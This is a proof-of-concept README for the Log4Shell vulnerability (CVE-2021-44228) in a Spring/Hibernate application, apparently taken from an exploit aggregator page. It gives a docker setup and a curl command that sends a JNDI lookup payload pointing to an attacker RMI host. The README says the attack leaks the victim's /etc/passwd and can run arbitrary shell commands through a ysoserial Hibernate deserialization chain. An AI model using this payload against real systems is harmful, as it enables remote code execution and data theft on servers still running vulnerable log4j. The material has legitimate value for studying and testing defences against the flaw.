## https://sploitus.com/exploit?id=52BA1465-B7E9-59C1-A20F-E38A5EAE272D
# CVE-2021-44228 POC - Spring / Hibernate
_This POC uses Spring / Hibernate, however a similar approach of rmi -> deserialization could be used to trigger any deserialization vulnerability_
# TL;DR
```shell
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'
```
You should see the contents of the victim's /etc/passwd appear in the logs of the `attacker` container.
You can replace the command in the `exploit` service to run any shell command on the victim.
## Victim
The victim is running a standard [starter spring app](https://start.spring.io/#!type=gradle-project&language=java&platformVersion=2.6.1&packaging=jar&jvmVersion=11&groupId=dev.uint0.pocs&artifactId=cve202144228&name=cve202144228&description=CVE-2021-44228%20POC%20-%20Spring%20%2F%20Hibernate&packageName=dev.uint0.pocs.cve202144228&dependencies=data-jpa,web,h2) with the "Spring Data JPA" (for Hibernate), "Spring Web", and "H2" (as a data store) dependencies. Only 2 modifications have been made on top of this
1. Removed tests
2. Replaced the `slf4j` logger with the vulnerable `log4j`
All dependencies are up to date. There are no magic flags enabled.
The victim exposes a `POST`-able endpoint on `/` which will log the request.
## Exploit
The exploit relies on a fork of [ysoserial](https://github.com/uint0/ysoserial) using the `Hibernate` exploit generator. In order to have the exploit to work with the latest version of hibernate we will need to recompile ysoserial.